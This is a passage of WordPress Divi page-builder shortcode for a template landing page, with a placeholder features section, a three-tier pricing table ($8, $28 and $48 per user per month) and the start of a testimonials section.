text_font_size=\"52\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Amazing features.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"87px|||\" custom_padding_last_edited=\"on|phone\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"7px||0px|\" parallax_3=\"off\" parallax_method_3=\"off\" gutter_width=\"4\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/22.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" disabled=\"off\" disabled_on=\"off||\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin_phone=\"40px|||\" custom_margin_last_edited=\"on|phone\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"30px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Feature one</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"5px|||\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Phasellus viverra, ipsum quis congue lacinia, turpis purus feugiat odio, at ullamcorper purus purus.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/22.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" disabled=\"off\" disabled_on=\"off||\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin_phone=\"40px|||\" custom_margin_last_edited=\"on|phone\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"30px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Feature two</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"5px|||\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Phasellus viverra, ipsum quis congue lacinia, turpis purus feugiat odio, at ullamcorper purus purus.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/22.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"left\" disabled=\"off\" disabled_on=\"off||\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin_phone=\"40px|||\" custom_margin_last_edited=\"on|phone\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"30px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Feature three</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"5px|||\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Phasellus viverra, ipsum quis congue lacinia, turpis purus feugiat odio, at ullamcorper purus purus.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"47px||127px|\" custom_padding_last_edited=\"on|tablet\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"10px||52px|\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" custom_padding_tablet=\"17px||127px|\" gutter_width=\"2\" background_color_1=\"rgba(255,255,255,0)\" background_color_2=\"#ffffff\" background_color_3=\"#ffffff\" background_color_4=\"#ffffff\" custom_css_main_2=\" border-radius: 4px;||box-shadow: 5px 5px 5px #D2D0CB;\" custom_css_main_3=\" border-radius: 4px;||box-shadow: 5px 5px 5px #D2D0CB;\" custom_css_main_4=\" border-radius: 4px;||box-shadow: 5px 5px 5px #D2D0CB;\"][et_pb_column type=\"4_4\"][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"BUTTON\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"13\" button_text_color=\"#303030\" button_bg_color=\"#ffffff\" button_border_width=\"0\" button_border_color=\"#ffffff\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#303030\" button_bg_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_before=\"display: none !important;\" custom_css_main_element=\"padding-top: 15px !important;||padding-right: 38px !important;||padding-bottom: 14px !important;||padding-left: 38px !important;||||font-weight:700;\"]\n\n\n\n[/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#28 Pricing Table\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"119px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"540px\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"47px|||\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#c1c1c1\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 47%;||margin-right: 47%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#c1c1c1\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 44%;||margin-right: 44%;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Pricing table.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"67px||87px|\" custom_padding_last_edited=\"on|phone\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"7px||52px|\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" custom_padding_tablet=\"37px||87px|\" custom_css_main_1=\"border: 1px solid #EAEAEA;\" custom_css_main_2=\"border: 1px solid #EAEAEA;\" custom_css_main_3=\"border: 1px solid #EAEAEA;\" background_color_2=\"rgba(234,234,234,0)\"][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"46px||19px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Starter Plan</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"82\" text_text_color=\"#3e51b5\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||10px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p>$8</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#6a6a6a\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||33px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p class=\"p1\"><span class=\"s1\">Per user/ month.</span></p>\n\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"BUTTON\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"13\" button_text_color=\"#ffffff\" button_bg_color=\"#3e51b5\" button_border_width=\"0\" button_border_color=\"#3e51b5\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#3e51b5\" button_border_color_hover=\"#3e51b5\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_before=\"display: none !important;\" custom_css_main_element=\"padding-top: 15px !important;||padding-right: 38px !important;||padding-bottom: 14px !important;||padding-left: 38px !important;||||font-weight:700;||||\"]\n\n\n\n[/et_pb_button][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"off\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" height=\"0.5px\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"65px|9%|23px|9%\" custom_css_main_element=\"font-weight:500;\" text_line_height=\"1.1em\"]\n\n<p><img class=\"alignnone size-full wp-image-26570\" style=\"float: left;margin-right:24px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/23.png\" alt=\"34\" width=\"26\" height=\"26\"><br>\n</p><p style=\"margin-top:-15px\">1,000 messages</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" custom_css_main_element=\"margin-left:9%;||margin-right:9%;\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#949494\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"44px|9%|24px|9%\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><img class=\"alignnone size-full wp-image-26570\" style=\"float: left;margin-right:24px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/23.png\" alt=\"34\" width=\"26\" height=\"26\"><br>\n</p><p style=\"margin-top:-15px\">unlimited data</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" custom_css_main_element=\"margin-left:9%;||margin-right:9%;\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#949494\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"44px|9%|24px|9%\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><img class=\"alignnone size-full wp-image-26570\" style=\"float: left;margin-right:24px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/23.png\" alt=\"34\" width=\"26\" height=\"26\"><br>\n</p><p style=\"margin-top:-15px\">unlimited users</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" custom_css_main_element=\"margin-left:9%;||margin-right:9%;\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#949494\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"44px|9%|44px|9%\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><img class=\"alignnone size-full wp-image-26570\" style=\"float: left;margin-right:24px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/23.png\" alt=\"34\" width=\"26\" height=\"26\"><br>\n</p><p style=\"margin-top:-15px\">first 7 days free</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"46px||19px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Business Plan</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"82\" text_text_color=\"#3e51b5\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||10px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p>$28</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#6a6a6a\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||33px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p class=\"p1\"><span class=\"s1\">Per user/ month.</span></p>\n\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"BUTTON\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"13\" button_text_color=\"#ffffff\" button_bg_color=\"#3e51b5\" button_border_width=\"0\" button_border_color=\"#3e51b5\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#3e51b5\" button_border_color_hover=\"#3e51b5\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_before=\"display: none !important;\" custom_css_main_element=\"padding-top: 15px !important;||padding-right: 38px !important;||padding-bottom: 14px !important;||padding-left: 38px !important;||||font-weight:700;||||\"]\n\n\n\n[/et_pb_button][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"off\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" height=\"0.5px\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"65px|9%|23px|9%\" custom_css_main_element=\"font-weight:500;\" text_line_height=\"1.1em\"]\n\n<p><img class=\"alignnone size-full wp-image-26570\" style=\"float: left;margin-right:24px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/23.png\" alt=\"34\" width=\"26\" height=\"26\"><br>\n</p><p style=\"margin-top:-15px\">10,000 messages</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" custom_css_main_element=\"margin-left:9%;||margin-right:9%;\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#949494\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"44px|9%|24px|9%\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><img class=\"alignnone size-full wp-image-26570\" style=\"float: left;margin-right:24px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/23.png\" alt=\"34\" width=\"26\" height=\"26\"><br>\n</p><p style=\"margin-top:-15px\">unlimited data</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" custom_css_main_element=\"margin-left:9%;||margin-right:9%;\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#949494\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"44px|9%|24px|9%\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><img class=\"alignnone size-full wp-image-26570\" style=\"float: left;margin-right:24px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/23.png\" alt=\"34\" width=\"26\" height=\"26\"><br>\n</p><p style=\"margin-top:-15px\">unlimited users</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" custom_css_main_element=\"margin-left:9%;||margin-right:9%;\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#949494\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"44px|9%|44px|9%\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><img class=\"alignnone size-full wp-image-26570\" style=\"float: left;margin-right:24px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/23.png\" alt=\"34\" width=\"26\" height=\"26\"><br>\n</p><p style=\"margin-top:-15px\">first 7 days free</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"46px||19px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Extended Plan</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"82\" text_text_color=\"#3e51b5\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||10px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p>$48</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#6a6a6a\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||33px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p class=\"p1\"><span class=\"s1\">Per user/ month.</span></p>\n\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"BUTTON\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"13\" button_text_color=\"#ffffff\" button_bg_color=\"#3e51b5\" button_border_width=\"0\" button_border_color=\"#3e51b5\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#3e51b5\" button_border_color_hover=\"#3e51b5\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_before=\"display: none !important;\" custom_css_main_element=\"padding-top: 15px !important;||padding-right: 38px !important;||padding-bottom: 14px !important;||padding-left: 38px !important;||||font-weight:700;||||\"]\n\n\n\n[/et_pb_button][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"off\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" height=\"0.5px\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"65px|9%|23px|9%\" custom_css_main_element=\"font-weight:500;\" text_line_height=\"1.1em\"]\n\n<p><img class=\"alignnone size-full wp-image-26570\" style=\"float: left;margin-right:24px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/23.png\" alt=\"34\" width=\"26\" height=\"26\"><br>\n</p><p style=\"margin-top:-15px\">40,000 messages</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" custom_css_main_element=\"margin-left:9%;||margin-right:9%;\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#949494\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"44px|9%|24px|9%\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><img class=\"alignnone size-full wp-image-26570\" style=\"float: left;margin-right:24px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/23.png\" alt=\"34\" width=\"26\" height=\"26\"><br>\n</p><p style=\"margin-top:-15px\">unlimited data</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" custom_css_main_element=\"margin-left:9%;||margin-right:9%;\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#949494\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"44px|9%|24px|9%\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><img class=\"alignnone size-full wp-image-26570\" style=\"float: left;margin-right:24px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/23.png\" alt=\"34\" width=\"26\" height=\"26\"><br>\n</p><p style=\"margin-top:-15px\">unlimited users</p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#eaeaea\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" custom_css_main_element=\"margin-left:9%;||margin-right:9%;\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#949494\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"44px|9%|44px|9%\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><img class=\"alignnone size-full wp-image-26570\" style=\"float: left;margin-right:24px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/23.png\" alt=\"34\" width=\"26\" height=\"26\"><br>\n</p><p style=\"margin-top:-15px\">first 7 days free</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#25 Testimonials\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" background_color=\"#eaeaea\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"119px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"540px\" custom_padding_phone=\"41px|||\" custom_padding_last_edited=\"on|phone\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#93a4a2\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 47%;||margin-right: 47%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#93a4a2\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 44%;||margin-right: 44%;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Testimonials.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"57px||119px|\" custom_padding_last_edited=\"on|desktop\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" 